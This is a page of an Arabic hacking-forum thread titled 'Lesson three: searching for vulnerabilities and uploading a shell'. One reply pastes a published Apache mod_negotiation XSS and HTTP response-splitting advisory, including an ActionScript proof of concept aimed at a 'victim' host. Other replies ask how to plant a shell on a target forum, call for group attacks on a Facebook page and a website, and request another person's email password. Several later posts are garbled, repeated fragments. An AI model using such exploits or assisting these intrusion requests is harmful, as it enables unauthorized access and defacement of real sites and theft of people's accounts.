المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : الدرس الثالث: البحث عن الثغرات ورفع الشيل



الصفحات : 1 [2]

كيفن ميتنيك الكوندر
04-12-2011, 04:44 PM
بــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــارك اللــــــــــــه فيـــــــــــــك

كيفن ميتنيك الكوندر
04-12-2011, 04:47 PM
لــكـــــــــــــــــن مــــــــــــــــــــــــ ــــــمــــكـــــــــــــ ــــــــن فــــيــــــــديـــــــوه ــــــات تـــعــلــيــمـــــــيـــ ـــــــة افــــضــــــل

الحوووت
04-12-2011, 05:31 PM
شكراً لك على الشرح أخي العزيز بس هناك مشكلة في الروابط لا تعمل فديتك اذا كان هناك حل ارجوا إخباري نحن نريد أن نتعلم أذا امكن المشكلة الكل في هذا القسم يقولون لا تعمل الروابط عفواً بعض الروابط التي في الشرح ........وتقبل مروري فديتك

Mad Devil
04-14-2011, 11:09 AM
بارك الله فيك يالغالي
تحياتي

نتعلم منكم
04-18-2011, 09:59 PM
مشكوووور ,,

تسلم يمناااااااكـ ,,

تقبل مروووري ...
يا ابوasd

prince_hack
04-19-2011, 01:58 AM
جزاك الله الف خير يااسديلي
ومشكووووووووور على الشرح الوافيى والمميز

JoKeR_pS
04-21-2011, 01:29 PM
واصل يا غالي
مميز و الله

السيابي
04-21-2011, 07:04 PM
thnxxxxxxxxxxxxxxxxxxxxxxxxxx

بيبي هاكرز
04-25-2011, 04:42 AM
ياخواني حد يعلمني شو هل حكي ياه ما حد يتطوع يعلمنا الهكر

بيبي هاكرز
04-25-2011, 04:49 AM
هذاا ايميلي بس بدون ختراق لان ما عندي دفاع عن نفس مبتدئ في الكمبيوتر وابي اتعلم الهكر ههههههههههههه نكته بس نبي ندخل في الكبير والله واكبر هذي ايميلي [email protected] بس لا تخترق قبل ما تعلمني كيف ادافع عن نفسي وكيف هكر وبعدين هكر براحتك

ادمان هكر
05-09-2011, 05:35 PM
مشكوووووووووور تقبل مروي .........

ادمان هكر
05-09-2011, 05:37 PM
مشكووووور على الموضوع تقبل مرووووري

malek_agha
05-09-2011, 07:18 PM
مشكور اخي على ها المجهود

Xturbedo
05-10-2011, 01:36 AM
Tnx Dude Israel Go To Hell

البرق الخاطف
05-12-2011, 07:13 PM
الله عليك يا كبير

Ranger
05-14-2011, 07:03 AM
تقبل الله منك حسن أعمالك

jaafar alaa
05-15-2011, 08:52 PM
مشكور على مجهودك والله يعطيك العافية

السيابي
05-15-2011, 09:01 PM
مشكوووووووووووووور اخي بس بايش تنصحني استعمل

البرق الخاطف
05-20-2011, 07:13 PM
شكرا على الشرح الوافى

HACprinso0o0oKER
05-22-2011, 03:36 AM
شكرا لجهودكم ومنكم نستفيد

HACprinso0o0oKER
05-22-2011, 03:37 AM
بس احنا قلنا في هذا الدرس رفع الشل بس ما وضحنا عن طريق اي برامج تكون رفع الشل

3ammar
05-30-2011, 04:04 PM
بارك الله فيك

r3da
06-15-2011, 01:09 PM
جزاك الله الف خير

haboubamix
06-15-2011, 10:56 PM
شرح ا كتر من رائع

فخ فخ
06-16-2011, 06:04 PM
مششششششششششششششششششششششكو ر اخوي على الشرح وجزاك الله بالجنه
بس ياخوي ابي اطبق على موقع ولاني فاهم كيف اطبق على موقع ياليت تفيدني اكثر

Noody
06-16-2011, 06:44 PM
جـــــــــــــــــزآك الله خيـــر ع آلدرووووس
بس بصـرآحة مآ فهمت كيف آطبق !!

harking
06-20-2011, 04:50 PM
شكرا لك علي الموضوع الرائع

Grudge-Hack
06-26-2011, 06:12 PM
جزاك الله الف خير وجعلها في موازين حسناتك

adam master
06-27-2011, 10:13 AM
شكرا جزيلا على الشروحات الرائعة

hoda_love
06-28-2011, 12:19 PM
aشكرررررررررررررررررررررر� �ا على الشرح

اليوم الاول
06-29-2011, 11:47 AM
الله يجزيك خير

محب للخير
07-23-2011, 12:04 AM
جززززززززززاك الله خير والله موضوع شيق ونفسى اخترق موقع مشان بيسب فى الاسلام

sami abo lorns
07-23-2011, 03:17 PM
مشككوووورررررررر

Mr.R3boob HaCkEr
07-29-2011, 02:41 AM
بارك الله فيك

Elgharibe Elgharibe
07-31-2011, 05:36 PM
ومنكم نستفيد ^ _ *

cry wolef
08-01-2011, 02:36 AM
مشكوووووور والله يعطيك الف عافيه

Klachenkove
08-01-2011, 05:49 AM
شكراااااااااااااااااا

abdall1900
08-12-2011, 09:38 PM
السلام عليكم .............
انا عندي ثغرة ولكن لا اعرف استغلالها..........خصوصا انها من ثغرات apache القوي
هذي معلومات عنها....يلي عنده حل يمكن يساعدنا hackrs :


// Tested on IE 7 and FF 2.0.11, Flash plugin 9.0 r115
// Compile with flex compiler
package
{
import flash.display.Sprite;
import flash.net.*
public class TestXss extends flash.display.Sprite {
public function TestXss(){
var r:URLRequest = new URLRequest('http://victim/<img%20src=sa%20
onerror=eval(document.location.hash.substr(1))>#alert(123)');

r.method = 'POST';
r.data = unescape('test');
r.requestHeaders.push(new URLRequestHeader('Accept', 'image/jpeg; q=0'));

navigateToURL(r, '_self');

}
}
}

Arrow Topic :
Apache mod_negotiation Xss and Http Response Splitting

Arrow SecurityAlert : 3575
Arrow CVE : CVE-2008-0455
Arrow CVE : CVE-2008-0456
Arrow SecurityRisk : Medium Security Risk Medium (About)
Arrow Remote Exploit : Yes
Arrow Local Exploit : No
Arrow Exploit Available : No
Arrow Credit : Stefano Di Paola
Arrow Published : 25.01.2008

Arrow Affected Software : Apache
<=1.3.39
<= 2.0.61
<= 2.2.6



Arrow Advisory Content :

Apache mod_negotiation Xss and Http Response Splitting

Date: January 22th, 2008

Tested Versions: Apache <=1.3.39
<= 2.0.61
<= 2.2.6

Minded Security ReferenceID:
MSA01150108

Credits:
Discovery by
Stefano Di Paola of Minded Security
stefano.dipaola [_at_] mindedsecurity.com

Severity: Low/Medium

Permalink:
http://www.mindedsecurity.com/MSA01150108.html

[ Background ]

>From Apache Mod_Negotiation page:

Content negotiation, or more accurately content selection,
is the selection of the document that best matches the clients
capabilities, from one of several available documents. There are
two implementations of this.
* A type map (a file with the handler type-map) which explicitly
lists the files containing the variants.
* A MultiViews search (enabled by the MultiViews Option, where the
server does an implicit filename pattern match, and choose from
amongst the results.

[ Summary ]

Mod_negotiation doesn't sanitize filenames in '406 Not Acceptable'
response and '300 Multiple Choices' message body.
This could lead to Xss if the name of the file is controlled by an
attacker (i.e. by previously uploading it).

Moreover, as the list of the filenames is also sent, without being
sanitized, in the response header, it could result in a Http Response
Splitting [1] issue if the name of the file contains 'n' (Line Feed).

[ Analysis ]

I. Cross Site Scripting

Let's suppose mod_negotiation is enabled and an attacker could upload
a file with arbitrary name and whatever mime extension.
For example a legit jpeg file named:

<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg

Then by requesting it without extension with Accept header set to
image/jpeg; q=0,

----------------------------------------------------

GET <img%20src=sa%20onerror=eval(document.location.hash .substr(1))>
HTTP/1.1
Host: 127.0.0.1
Accept: image/jpeg; q=0

HTTP/1.1 406 Not Acceptable
Date: Tue, 15 Jan 2008 15:43:11 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Alternates: {"<img src=sa
onerror=eval(document.location.hash.substr(1))>.jpg" 1 {type image/jpeg}
{length 2}}
Vary: negotiate
TCN: list
Content-Length: 610
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>406 Not Acceptable</title>
</head><body>
<h1>Not Acceptable</h1>
<p>An appropriate representation of the requested resource /<img
src=sa
onerror=eval(document.location.hash.substr(1))> could not be found
on
this server.</p>
Available variants:
<ul>
<li><a href="<img src=sa
onerror=eval(document.location.hash.substr(1))>.jpg">
<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg</a> ,
type image/jpeg</li>
</ul>
<hr>

-----------------------------------------------------

As it could be noted, no sanitization of the filename is done,
leading to Xss.

II. Http Response Splitting

By using a similar technique, Http Response Splitting could be
triggered if there's some way to set the name of the file like
the following:

'junk
Header: Injected
blah:.jpg'

Then, by requesting the urlencoded file name:

------------------------------------------------------
GET /junk%0aHeader:%20Injected%0ablah: HTTP/1.1
Host: 127.0.0.1
Accept: image/jpeg; q=0

HTTP/1.1 406 Not Acceptable
Date: Tue, 15 Jan 2008 16:06:52 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Alternates: {"junk
Header: Injected <----- Here!
blah:.jpg" 1 {type image/jpeg} {length 2}}
Vary: negotiate
TCN: list
Content-Length: 508
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>406 Not Acceptable</title>
</head><body>
<h1>Not Acceptable</h1>
<p>An appropriate representation of the requested resource /junk
Header: Injected
blah: could not be found on this server.</p>
Available variants:
<ul>
<li><a href="junk
Header: Injected
blah:.jpg">junk
Header: Injected
blah:.jpg</a> , type image/jpeg</li>
</ul>
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at 127.0.0.1 Port
80</address>
</body></html>

------------------------------------------------------

As it could be noted, the header response is splitted and "Header:
Injected" is,
indeed injected.

[ Proof of Concept ]

The following actionscript can be used in order to trigger the Xss.

----------------------------------------------------------
// Tested on IE 7 and FF 2.0.11, Flash plugin 9.0 r115
// Compile with flex compiler
package
{
import flash.display.Sprite;
import flash.net.*
public class TestXss extends flash.display.Sprite {
public function TestXss(){
var r:URLRequest = new URLRequest('http://victim/<img%20src=sa%
20onerror=eval(document.location.hash.substr(1))>#alert(123)');

r.method = 'POST';
r.data = unescape('test');
r.requestHeaders.push(new URLRequestHeader('Accept', 'image/jpeg;
q=0'));

navigateToURL(r, '_self');

}
}
}
----------------------------------------------------------

[ Credits ]

Stefano di Paola is credited with the discovery of this vulnerability.

[ Disclosure Timeline ]

15/01/2008 Initial vendor notification
16/01/2008 Vendor Confirmed
21/01/2008 Coordinated public disclosure
22/01/2008 Minded Security Research Lab Advisory

[ Reference ]

[1] "Divide and Conquer, HTTP Response Splitting, Web Cache
Poisoning Attacks, and Related Topics ", Amit Klein, March 2004.
http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pd
f

[ Disclaimer ]

The information within this paper may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information.
Any use of this information is at the user's own risk.

Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express
consent of Minded Security Research Lab. If you wish to reprint the
whole or any part of this Alert in any other medium excluding
electronic medium, please e-mail research (at) mindedsecurity (dot) com
[email concealed]
for permission.

Copyright (c) 2008 Minded Security, S.r.l..

All rights reserved worldwide.

--
---
Research Labs
Minded Security S.r.l.

Web: http://www.mindedsecurity.com

Mail: research_at_mindedsecurity.com

ossa
08-16-2011, 03:02 AM
شكرا على الموضوع ولكن لو تكرمت علينا وشرحت كيفية كشف الثغرة وفكها وشكرا لك

ooday25
08-16-2011, 08:45 PM
مشكورررررررررررررررررر

اليحموم
08-17-2011, 04:51 PM
لايك
بجد متميز

aboarab
08-18-2011, 01:16 PM
الله يعطيك ألف عافية ومشكور كثير على تعبك

SILEN
08-21-2011, 05:04 PM
ومشكووووووووور على الشرح الوافيى والمميز

فرعون أكس بي XP
08-25-2011, 03:45 PM
بارك الله في يا ابو الشباب

Omar Hack
08-25-2011, 05:01 PM
جزاك الله خيراً أخي الكريم
شرح رائع
تقبل مروري

الايهم123
08-26-2011, 08:04 PM
مشكور خيو واصل ابداعك

ود بله
08-27-2011, 10:22 PM
مشكوووووووووور

ود بله
08-27-2011, 10:24 PM
حياك الله وبارك فيك

ود بله
08-27-2011, 10:25 PM
الله يكتر خيرك

ود بله
08-27-2011, 10:30 PM
بس عندي طلب عاوز الباسوورد بتاع الايميل دا algmry2‎@hotmail.comارسله لي فيhashim260‎@gmail.com

فارس.فارس
08-28-2011, 11:32 PM
بارك الله فيك ,, شكراً ,,

الصقر الذهبي
09-01-2011, 04:23 PM
مبدع دوما تسلم على الوقت والمجهود

zeenaa
09-04-2011, 05:19 AM
بشكركم على هذا الكوورس، وانا بتابع معكم ان شاء الله

saw-19
09-05-2011, 01:31 AM
مشكور اخي الكريم

mouad05hacker
09-05-2011, 11:17 AM
مشكــــــــــــــــــــــ ــــــــــــــــــــور

alqanas103
09-05-2011, 01:23 PM
اخوي ياريت تشرح نوع جديد من الثغرات لاني صارت هي قديمة

الباحث79
09-05-2011, 04:12 PM
احسنت على هذا المجهود الرائع

مـخـآوي الـجـروح
09-06-2011, 06:01 PM
طرح في قمة الروعه يعطيك العافيه

xXMrFLlLhXx
09-07-2011, 02:52 PM
مشكووور يـ ع ـطيك الـ ع ـافيه

دمت مبدع ...

JOKER CRIMINAL
09-08-2011, 05:33 PM
يعجز اللسان عن وصفك

فايف ستار

سطام القحطاني
09-08-2011, 11:38 PM
مشكوووور اخوووي ع الدررررس

الله يعطيك العافية وربي يوفقك

تحياتي لك.

AmMar PhP
09-09-2011, 03:08 AM
مشكووووور ياغالي انا ... احمل الدروس واتصفحها ولكن عند دراستها اذا لم أعرف شيء سأعووود شكراً

جنون الهكر العنزي
09-09-2011, 04:44 AM
مشكور اخوي

Black-ares
09-10-2011, 04:34 PM
نجازاك الله خير

alexander_hacker
09-11-2011, 03:35 AM
بارك الله فيك اخوي على تعبك بس موقع ميلوورم مايشتغل ممكن تقولي ليش؟

foxlove2010
09-14-2011, 12:09 PM
سلمك الله اخى ولكن يكمن الاختراق فى ايجاد الثغرة

omarezzeddine25
09-16-2011, 08:55 AM
بارك الله فيك

محارب اليهود
09-18-2011, 08:13 PM
شرررررح حلو بس المشكله عند الفهم
ههههههههههههههههههههههههه

سربوت الوزارات
09-18-2011, 09:23 PM
احسسسسسسسسسسسسسسسسسسنت


مشكور تقبل مروري

bouti2011
09-20-2011, 09:43 PM
مشكووووووووووووووووووووور

kmando
09-23-2011, 03:53 PM
مشكوووووررر

abdallh
09-23-2011, 10:30 PM
http://www.google.jo/imgres?q=%D8%AC%D9%8A%D9%88%D8%B4+%D8%A7%D9%84%D9% 87%D9%83%D8%B1&hl=ar&gbv=2&tbm=isch&tbnid=Lvvhte_0TI9tNM:&imgrefurl=http://www.aljyyosh.com/vb/&docid=xX53h4uzK-cTrM&w=488&h=245&ei=IN58TrmPJIOY8QOxp5F9&zoom=1&iact=rc&dur=407&page=1&tbnh=91&tbnw=182&start=0&ndsp=27&ved=1t:429,r:5,s:0&tx=108&ty=42&biw=1440&bih=799

abdallh
09-23-2011, 10:30 PM
http://www.google.jo/url?source=imglanding&ct=img&q=http://www.aljyyosh.com/vb/blackgreen/logo.jpg&sa=X&ei=Kd58ToqaFse48gPLqfTFCQ&ved=0CAkQ8wc&usg=AFQjCNHRshwGNlG6lKj3CuZOqM_r7xGxLQ

titoalking2011
09-27-2011, 04:38 AM
مشكور بس ممكن تبعتلي رسالة او فيديو يوضح كيفية عمل الشل

trojansim
09-29-2011, 01:19 AM
جزاك الله الف خير

the black emo
09-29-2011, 08:04 PM
الله يعطيك الف عافيه

سعد العنزي
09-30-2011, 07:11 PM
مششكوووورـآ خي

-.-
10-02-2011, 01:34 PM
thanxxxxxxxxxxxxxxxxxxxxxxxx

مهكر القلوب
10-17-2011, 01:42 PM
مشكوووووووووووووور بارك الله فيك

HaCKer011
10-20-2011, 11:12 PM
مشكووووور اخي asdely على الدورة الرائعة
منتظرين جديدك

سربوت الوزارات
10-21-2011, 05:38 PM
يعطيك العافيه تمت تجربتها 100%100 اشكرك

حمودي خواجي
10-23-2011, 05:05 PM
مشكوووووور

سهم الثلج الابيض
10-26-2011, 07:23 PM
الله يحفضكم
والف شكر

حموودي خواجي
10-28-2011, 06:51 PM
يسلموووووووو ياخويه

الصحراء الصماء
10-28-2011, 08:18 PM
مشكوووووووور اخوي علي المجهوووووووووووووووووووو وووووووووووووووووووووور بس الكلام هذا لا يعمل شيء

قيصر الهكر
11-01-2011, 03:29 AM
تسلم يا الذيب .... ورايتك بيضاء ,,,,
والى الامام يابطل !!!!!!!!
مشكوووووووووووور ع الشرح
وانشالله راح نستفيد

ســٌكٌوُن ًإْنُـثــُـى
11-01-2011, 10:20 AM
مشكوووووووور

m53
11-02-2011, 01:20 AM
شكرا هشوف الفيديو

حمودي خواجي
11-03-2011, 02:44 AM
مشكوووووور والله يعطيك الف عافيه

شرح كااااااااااافي و ااااااافي

تقبل مروووري ...

آڵـڼـآڛف
11-03-2011, 09:21 PM
ومشكووووووووور على الشرح الوافيى والمميز

هكر NO رحمه
11-04-2011, 04:05 PM
اوك اخوي جاري التجربه ويعطيك ربي الف عافيه يا ربي

آڵـڼـآڛف
11-04-2011, 07:18 PM
ششكر معلمات جميله
*_^

kingkoko
11-09-2011, 11:38 PM
شكرا على المجهود الذي تقدمه معلومات تحتاج الى دراسة طويلة ومتابعة خطوة بخطوة سنحاول والله الموفق

دكتور هكر2012
11-10-2011, 02:57 PM
مشكووووووووووووور
لآلآلآهنت

x5527
11-10-2011, 03:18 PM
وفقك الله وشكراً على هذا الشرح الاكثر من رائع

deathsign
11-12-2011, 04:23 PM
السلام عليكم ....كيف اربط الثغره بال شيل ؟؟؟؟

مرجوج عرعر
11-15-2011, 05:55 AM
يعطيك العافية اخوووووي

رعباوي هكر
11-19-2011, 04:02 PM
مشكور اخوي

رعباوي هكر
11-19-2011, 04:03 PM
موفق يارب..

DaVaNci
11-20-2011, 05:22 PM
قواك الله اخوي على الموضوع الطيب وتسلم ايدك

mystrotrompette
11-22-2011, 03:25 PM
foooooooooormidable mon frère merci

the next
11-22-2011, 11:17 PM
الله يقويك وتفيدنا بمواضيع جديدة وحلوة

The Haker Of Iraq
11-28-2011, 08:01 PM
تسلم على الدروة تقبل مروري

عراق هكر

|ναмριяє|
12-01-2011, 05:56 PM
gamd wlaahy

mouad ourrad
12-03-2011, 12:04 PM
مشكووووووووووووووووور بس كيف ترفع شل على موقع

قبرالموت
12-03-2011, 07:14 PM
شكرا لك على مجهودك الرائع

luther khaled
12-03-2011, 10:07 PM
مشكووووووووور على الشرح

اسامة98
12-03-2011, 10:44 PM
ممممممممممممممممممممممممم مممممممممممششششششششششكككك كككككووووووووووورررررررر

virus3033
12-09-2011, 12:52 AM
مشكوووووووووووووووووووووو ووووور لا هنت

جنيرال هكر
12-12-2011, 01:39 PM
مشكووووووووووووووووووور

EgYpT HaCkEr
12-13-2011, 01:00 PM
جزاك الله خيرا و يسر لك أمرك وجعله في ميزان حسناتك

محب لله
12-19-2011, 08:29 PM
سلام درس و لا أروع الله يعطيك 100000000 عافية


جزاك الله من جناته العليا



بالتوفيق لك وللجميع ............

تقبل مروري
في امان الله

ѕτσяίεѕ
12-20-2011, 07:50 PM
يعطيك العوافي

شرح رائع

صموت ستايل
12-22-2011, 07:12 AM
مشكور على الشرح

ABU ADLE
12-23-2011, 07:29 PM
مشكور عل الدرس

x-blood-x
12-25-2011, 01:49 AM
thaaaaaaaaaaaaaaaaaaaaaaaaaaaaannnxxx!!!

hitman410
12-26-2011, 01:51 AM
مشكوووووور والله يعطيك الف عافيه

المشرف
01-01-2012, 01:15 PM
thanxxxxxxxxxxxxxxxxxxxxxxxx

المشرف
01-01-2012, 01:19 PM
مشكور على الشرح

المشرف
01-01-2012, 01:21 PM
مشكور عل الدرس

المشرف
01-01-2012, 01:22 PM
بارك الله بجهودك

المشرف
01-01-2012, 01:24 PM
الله يعطيك الف عافيه

المشرف
01-01-2012, 01:26 PM
thanxxxxxxxxxxxxxxxxxxxxxxxxthanxxxxxxxxxxxxxxxxxx xxxxxxthanxxxxxxxxxxxxxxxxxxxxxxxx

المشرف
01-01-2012, 01:27 PM
الله يعطيك الف عافيه الله يعطيك الف عافيه الله يعطيك الف عافيه الله يعطيك الف عافيه الله يعطيك الف عافيه الله يعطيك الف عافيه الله يعطيك الف عافيه الله يعطيك الف عافيه

المشرف
01-01-2012, 01:27 PM
بارك الله بجهودك بارك الله بجهودك بارك الله بجهودك بارك الله بجهودك بارك الله بجهودك بارك الله بجهودك بارك الله بجهودك بارك الله بجهودك

المشرف
01-01-2012, 01:28 PM
مشكور عل الدرس مشكور عل الدرس مشكور عل الدرس مشكور عل الدرس مشكور عل الدرس مشكور عل الدرس مشكور عل الدرس

المشرف
01-01-2012, 01:28 PM
مشكور على الشرح مشكور على الشرح مشكور على الشرح مشكور على الشرح مشكور على الشرح مشكور على الشرح مشكور على الشرح مشكور على الشرح مشكور على الشرح

المشرف
01-01-2012, 01:29 PM
البحث عن الثغرات ورفع الشيل البحث عن الثغرات ورفع الشيل البحث عن الثغرات ورفع الشيل البحث عن الثغرات ورفع الشيل البحث عن الثغرات ورفع الشيل

المشرف
01-01-2012, 01:29 PM
البحث عن الثغرات ورفع الشيل

مشكور على الشرح

البحث عن الثغرات ورفع الشيل

مشكور على الشرح

البحث عن الثغرات ورفع الشيل

مشكور على الشرح

داعس هكر
01-02-2012, 12:05 AM
نأإأإأإأإأإيس
[email protected]

sparo
01-02-2012, 12:27 AM
ولك تحياتي يالغالي ودمت بتألق ننتظرر المزيد .

يحيي الصدامي
01-03-2012, 06:28 AM
مشكور الله يعطيك العافيه ، تقبل مروري

يا هادي
01-05-2012, 12:57 AM
الله يبارك فيك

yheya
01-06-2012, 09:19 PM
مشكور:biggrin::biggrin:

afrekano
01-07-2012, 02:46 PM
الف شكر انا كنت مستنى الموضوع دة

mothoq
01-12-2012, 07:35 AM
هذا ما ابحث عنه
شكرا جزيلا

Yousif_Hacker
01-12-2012, 03:17 PM
حبيبي كيف اكشف ان موقع بيها ثغرات emote File Include
commands execution يعني كيف اعرف بيها اي نوع من ثغرات ؟؟؟؟؟؟؟

Black Magician
01-14-2012, 08:59 PM
تسسلم اخوي

001001
01-15-2012, 05:29 PM
اصلى يا مان هيا بنا نطبق :biggrin:

hacker sniper
01-15-2012, 10:39 PM
thnks u r the best

kaiser hackers
01-20-2012, 11:55 PM
جزاك الله الف خير ومشكور على الشرح سلمت يداك ورايتك بيضاء

fathi seddiki
01-23-2012, 01:10 PM
بارك الله فيك يا اخى....

كنج الهكرys
01-24-2012, 05:40 PM
مشــ،ـ،ـ،ـ،ـ،ـ،ـ،ـ،ــ،ـ،ـ ،ـ،ـ،ـ،ـور وتسلم ايدك

Alert
01-28-2012, 12:54 AM
مشكور أخوي على الدرس الرائع
صح ماني فاهم شي بس منكم ومن خبراتكم استفيد
w ana kaman );

mohammd.sa
01-28-2012, 01:48 PM
مشكووور اخوووي شرح متميز ورااائع

تقبل تحياتي

piso hacker
01-28-2012, 05:38 PM
مشكووووووور يا برنس

yogo
01-28-2012, 06:08 PM
على الموقع بشكل كامل
طبعاً يوجد ثغرات اخرى للمواقع لاكن ليست بمستوى هالنوعيه وباقي الثغرات اقل خطوره

نوضح طريقه عمل نوعية الثغرتين مع تطبيق عملي تجربة بنفسك

((Remote File Include))
طريقه عمل هذي الثغرات هي ربط الشل مع الموقع وهي اكثر الثغرات انتشار الأن
مثال

yogo
01-28-2012, 06:09 PM
مشكووووووور يا برنس

yogo
01-28-2012, 06:10 PM
w ana kaman );

yogo
01-28-2012, 06:11 PM
((Remote File Include))
طريقه عمل هذي الثغرات هي ربط الشل مع الموقع وهي اكثر الثغرات انتشار الأن
مثال

yogo
01-28-2012, 06:13 PM
س الثالث: البحث عن الثغرات ورفع الشيل

w ana kaman );

yogo
01-28-2012, 06:49 PM
طريقه عمل نوعية الثغرتين مع تطبيق عملي تجربة بنفسك

((Remote File Include))
طريقه عمل هذي الثغرات هي ربط الشل مع الموقع وهي اكثر الثغرات انتشار الأن
مثال


تعديل / حذف تعديل المشاركة الرد السريع على هذه المشاركة إضافة رد رد مع اقتباس رد مع اقتباس إقتباس متعدد لهذه المشاركة

yogo
01-28-2012, 06:49 PM
File Include))
طريقه عمل هذي الثغرات هي

yogo
01-28-2012, 06:50 PM
File Include))
طريقه عمل هذي الثغرات هي ربط الشل مع الموقع وهي اكثر الثغرات انتشار الأن
مثال


تعديل / حذف تعديل المشاركة الرد السريع على هذه المشاركة إضافة رد رد مع اقتباس رد مع اقتباس إقتباس متعدد لهذه المشاركة

yogo
01-28-2012, 06:59 PM
))
طريقه عمل هذي الثغرات هي ربط الشل مع الموقع وهي اكثر الثغرات انتشار الأن
مثال

yogo
01-28-2012, 07:03 PM
طريقه عمل هذي الثغرات هي ربط الشل مع الموقع وهي اكثر الثغرات انتشار الأن
مثال


تعديل / حذف تعديل المشاركة الرد السريع على هذه المشاركة إضافة رد رد مع اقتباس رد مع اقتباس إقتباس متعدد لهذه المشاركة

yogo
01-28-2012, 07:08 PM
PM #413
yogo
yogo متواجد حالياً
هكر مبتديء Array

تاريخ التسجيل
Jan 2012
المشاركات
15

افتراضي رد: الدرس الثالث: البحث عن الثغرات ورفع الشيل

طريقه عمل هذي الثغرات هي ربط الشل مع الموقع وهي اكثر الثغرات انتشار الأن
مثال

yogo
01-28-2012, 07:13 PM
تاريخ التسجيل
Jan 2012
المشاركات
15

افتراضي رد: الدرس الثالث: البحث عن الثغرات ورفع الشيل

yogo
01-28-2012, 07:23 PM
Jan 2012
المشاركات
15

yogo
01-28-2012, 07:37 PM
جيل
Jan 2012
المشاركات
15

افتراضي رد: الدرس الثالث: البحث عن الثغرات ورفع الشيل

yogo
01-28-2012, 07:39 PM
رد: الدرس الثالث: البحث عن الثغرات ورفع الشيل

Jan 2012
المشاركات
15

ArsHackEna
01-28-2012, 11:41 PM
شكراااا حبيبناااا

docnab2011
01-30-2012, 09:58 PM
شكرا علي المجهود أخى , كيف الحصول على شيل

osama0
01-31-2012, 05:44 PM
مشكوووووووووووووووووووور يا اخي

والله يجزيك الف خير على التعب

mem1hack
01-31-2012, 07:23 PM
شرح جميل ولكن هل ممكن شرح درس من بداية اكتشاف الثغرة حتى الاختراق بدرس كامل وشكرا مرة اخرى

ال بتشينو
01-31-2012, 09:52 PM
السلام عليكم ورحمة الله وبركاته.........

لاحول ولا قوة الا بالله العلي العظيم
لاحول ولا قوة الا بالله العلي العظيم
لاحول ولا قوة الا بالله العلي العظيم
انا بالصدفة لما كنت نتصفح في الفيس بوك لقيت صفحة اسمها حتى يهتز عرش الرحمن
والصفحة هده تجرت على الله عز وجل فيا اخوانى و اخواتي في جيوش الهكر صار عنكم علم بالموضوع اليوم انى نبي من الجميع يوحدوا الصف ضدد الصفحة هده ويخترقوها والحاضر يعلم الغايب
لااله الا الله محمد رسول الله
الله اكبر...الله اكبر...الله اكبر

prestige
02-01-2012, 09:33 PM
يعطيك العافيه بس انا مافهمت شئ

الحراكي
02-08-2012, 05:49 PM
ابو الشباب بدي فزعة ارجو الرد في موقع لا زم ندمره

andalousy
02-12-2012, 04:01 PM
مشكور اخي على الشرح التام متالق كعادتك

هكري يخوف
02-13-2012, 09:45 PM
مشكوررررررررررررررر

lOve Bomb
02-14-2012, 11:06 PM
شكرا أخي على الشرح
ولكن روابط التطبيق لا تعمل لأنك طبقت على موقع كبير وهو جوجل هو إذااكتشف ثغرة على طول يسدها ^_^

Hani7mr
02-16-2012, 05:00 PM
أخي اسدلي شكرا ما قصرت بس أنا عندي ملاحظات أو بالأحرى اقتراحاتأولا : أنا شفت بعض دروس الدورة وواضحة بشكل عام لكن هناك أيضا بعض المواضيع التي لم نفهمها جيدا ثانيا : أنا لا حظت انك لا تقوم بالرد على الاستفسارات التي يطرحها الأعضاء ممكن مشغول بس لازم يتم الرد على هذه الاستفساراتثالثا : اقترح عليك أن تجعل لكل موضوع من مواضيع الدورة هذه موضوع آخر ترد فيه على الاستفسارات لأن يساهم في تنظيم الموضوع لأن راح يكون مغلق مثلاالدرس الثالث : البحث عن الثغرات ورفع الشل. أ- استفسارات الدرس الثالث.وهكذا في جميع مواضيع الدورةوتقبل تحياتي وآسف على الازعاج.

black wolf hacker
02-16-2012, 10:31 PM
مشكوووووووووووووور

يحيى الطيب
02-19-2012, 12:58 AM
مشكوووووووووووووور يا خيووو

شكواي
02-20-2012, 02:05 AM
يعطيك العافيه على الشرح الجميل
بس انا ما افهمت شي احسها معقده شوي
ذلحين ابي ازرع شل في منتدى vb او الاستضافه حقته
عندي الاي بي حقهم
و السكربتات حقتهم


Powered by TRAIDNT

Powered by vBulletin Version 3.8.7


اي ثغره استعمل لهم ويا ليت اخوي لو تعطيني رابط الثغره يعني احط رابط الموقع المستهدف www.*****.com/vb واحط الكود الي فيه الشي والثغره يعني على طول يركب الشيل

لاني لي اسبوع انا والثغرات ذي في مناحله لا هي الي فهمتني وش اسوي ولا انا فهمتها واكون شاكر لك اخوي لو تفيدني

zaizo max
03-03-2012, 01:50 AM
لابد وان تكون موضوعاتك ليست غريبة على ASDELY-ScOrPiOn

روح هتان
03-03-2012, 04:19 PM
مشكوررررررررررررررررررررر ررررررر

امير المدمر
03-03-2012, 05:42 PM
الف شكر لك تحياتي

mgooode
03-05-2012, 01:35 PM
الله يسلم راسك من كل شر والله يحفظك ومشكوووور وتقبل تحياتي

MOSTAFA2000
03-06-2012, 10:00 AM
شكرا على الموضوع المميز

AQIDI HACKER
03-08-2012, 01:58 AM
مشكوووور على كل ماهو مميز
:)

c r a z y ~ N T
03-10-2012, 01:25 PM
صراحه اقولها بكل فخر لي سنتين ابي اتعلم الهكر و ما لقيت احد يعلمني والي يقدر يساعدني يكلمني لاهنتوؤؤؤؤؤؤؤؤؤؤؤؤؤؤ

Spiritual love
03-10-2012, 01:46 PM
يسلموووووووووووو

hackwar
03-13-2012, 12:36 AM
يعطيك العافية الدرس صعب شوي لكن لا شيئ صعب في الحياة

google-haker
03-14-2012, 08:19 PM
اجمل من رائع تسلم ايدك

معقد الحكومه
